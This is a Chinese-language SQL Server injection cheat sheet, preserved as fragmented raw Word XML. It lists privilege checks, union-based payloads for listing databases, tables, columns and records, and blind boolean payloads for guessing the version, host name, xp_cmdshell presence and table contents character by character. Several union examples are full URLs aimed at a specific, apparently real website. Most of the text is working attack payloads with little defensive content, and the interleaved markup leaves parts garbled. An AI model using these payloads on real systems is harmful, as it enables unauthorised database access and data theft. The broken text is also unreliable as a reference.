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Sqlserver数据库注入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Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS)，是一个比较大型的数据库。端口号为 1433。数据库后缀名 .mdf，注释符是 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sa权限：数据库操作，文件管理，命令执行，注册表读取等system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db权限：文件管理，数据库操作等 users-administrators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public权限：数据库操作 guest-users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b/>
        </w:rPr>
        <w:t>判断当前数据库用户权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(IS_SRVROLEMEMBER(‘sysadmin’))        //返回正常为sa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(IS_MEMBER(‘db_owner’))               //返回正常为DB_OWNER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(IS_srvrolemember(‘public’))          //public权限,较低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Sqlserver联合注入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------判断列数：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Order by 3   返回正常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Order by 4   返回错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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列数为3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------查看数据库：</w:t>
      </w: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"http://www.jingke.com.cn/news.aspx?p=%E7%BB%8F%E7%A7%91%E5%AE%8F%E8%BE%BE&amp;&amp;i=10%20union%20select%20null,db_name(),null"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aspx?i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=10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union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select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null,db_name(),null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（当前数据库）</w:t>
      </w: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"http://www.jingke.com.cn/news.aspx?p=%E7%BB%8F%E7%A7%91%E5%AE%8F%E8%BE%BE&amp;&amp;i=10%20union%20select%20null,db_name(),null"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aspx?i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=10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union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select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null,db_name(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),null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"http://www.jingke.com.cn/news.aspx?p=%E7%BB%8F%E7%A7%91%E5%AE%8F%E8%BE%BE&amp;&amp;i=10%20union%20select%20null,db_name(),null"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aspx?i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=10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union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select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null,db_name(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),null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"http://www.jingke.com.cn/news.aspx?p=%E7%BB%8F%E7%A7%91%E5%AE%8F%E8%BE%BE&amp;&amp;i=10%20union%20select%20null,db_name(),null"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aspx?i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=10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union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select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null,db_name(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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10"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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),null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.......</w:t>
      </w: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------爆表名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Style w:val="10"/>
          <w:rFonts w:hint="default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aspx?i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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hint="default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=10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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 w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>union select null,(select top 1 name from 数据库名..sysobjects where xtype='U' and id not in (select top N id from 数据库名..sysobjects where xtype='U')),null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">     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(数据库名是你想爆破的数据库名，N = 0 1 2 3 ....)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------爆列名：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Style w:val="10"/>
          <w:rFonts w:hint="default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aspx?i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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hint="default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=10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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union select null,(select name from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>') and colid=N),null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------爆内容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Style w:val="10"/>
          <w:rFonts w:hint="default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aspx?i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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hint="default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=10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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union select null,(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 xml:space="preserve">select top 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hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">列名 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:t>数据库..指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),null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Style w:val="10"/>
          <w:rFonts w:hint="default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aspx?i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia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hint="default" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text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=10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</w:rPr>
        <w:t>union select null,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(select top 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> not in (select top N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorAscii"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,null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b/>
          <w:bCs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Sqlserver盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r>
        <w:t>获取基本信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、判断是不是MSSQL</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and exists (select * from sysobjects)–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and exists (select count(*) from sysobjects)–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、猜解数据库版本</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and substring(@@version,22,4)=’2005′–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3、判断是否站库分离</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and @@servername=host_name()–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4、判断支不支持堆叠查询</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>;declare @d int–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>5、判断XP_CMDSHELL是否存在</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1=(Select count(*) FROM master..sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’)–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6、猜解主机名</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring(host_name(),1,1))&gt;49–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>7、猜解本地服务名</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring(@@servername,1,1))&gt;49–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>8、猜解当前数据库</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring(db_name(),1,1))&gt;97–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r>
        <w:t>获取用户及权限信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、猜解当前数据库用户</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring(user,1,1))&gt;97–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、判断当前数据库用户权限</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1=(IS_SRVROLEMEMBER(‘sysadmin’))–//返回正常为sa</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1=(IS_MEMBER(‘db_owner’))–//返回正常为DB_OWNER</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1=(IS_srvrolemember(‘public’))– //public权限,较低</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1= (HAS_DBACCESS(‘数据库’))– //判断是否有数据库的访问权限</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>以下命令仅适应于SQL Server2005及以上版本</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1= has_perms_by_name(db_name(), ‘DATABASE’, ‘ANY’)– //判断是否对当前库有所有权限</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and 1= has_perms_by_name(‘master’, ‘DATABASE’, ‘ANY’)–//sa权限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t>获取数据库信息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(N表示 0 1 2 3 4 ....)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、猜解数据库数目</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ((select count(name) from master..sysdatabases))&gt;1–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、逐个猜解数据库长度和名称</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>DBID：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and (select count(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>) from master.dbo.sysdatabases where dbid=N)=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>长度：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>and len(db_name(N))&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>and (select len(name) from master.dbo.sysdatabases where dbid=1)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>and (ascii(substring(db_name(N),1,1)))&gt;97–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>and (select count(</w:t>
      </w:r>
      <w:r>
        <w:t>) from master.dbo.sysdatabases where dbid=N and ascii(substring(name,1,1))&gt;90)=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r>
        <w:t>获取数据库中表的信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、猜解数据库中表的数目</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and (select count(name) from 数据库..sysobjects where xtype=’U’)&gt;28–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、逐个猜解数据库中表长度和名称</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>长度：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and len((select top 1 name from 数据库..sysobjects where xtype=’U’ and id not in(select top N id from 数据库..sysobjects where xtype=’U’)))&gt;5–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>名称：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring((select top 1 name from 数据库..sysobjects where xtype=’U’ and id not in(select top N id from 数据库..sysobjects where xtype=’U’)),1,1))&gt;97</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r>
        <w:t>获取表中列的信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、猜解表中列的数目</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and (select count(name) from 数据库..syscolumns where id=(select id from 数据库..sysobjects where name=’指定表’))&gt;1–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、逐个猜解表中的列长度和名称</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>长度：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and len((select top 1 col_name(object_id(‘指定表’),N) from 数据库..sysobjects))&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and len((select name from 数据库..syscolumns where id =(select id from 数据库..sysobjects where name=’指定表’) and colid=N))&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>名称：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring((select top 1 col_name(object_id(‘指定表’),N) from 数据库..sysobjects),1,1))&gt;72–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring((select name from 数据库..syscolumns where id =(select id from 数据库..sysobjects where name=’指定表’) and colid=N),1,1))&gt;73–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
      <w:r>
        <w:t>获取数据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asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>猜解表中记录的数目、数据长度和数据</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>数目：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and (select count(*) from 数据库..指定表)&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>长度：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and (select len(字段) from 数据库..指定表where 排除条件)&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  即：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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>and (select top 1 len(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii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) from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据库..指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii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where  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii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not in (select top 1 </w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii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from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据库..指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>))&gt;N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>数据：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>and ascii(substring((select cast(字段 as varchar) from 指定表 where 排除条件),1,1))&gt;1–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 即：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and ascii(substring((select top 1 cast(</w:t>
      </w:r>
      <w:r>
        <w:t>字段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 xml:space="preserve"> as varchar) from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表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 xml:space="preserve"> where </w:t>
      </w:r>
      <w:r>
        <w:t>字段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 xml:space="preserve"> not in (select top 1 </w:t>
      </w:r>
      <w:r>
        <w:t>字段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 xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表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)),1,1))&gt;1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Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
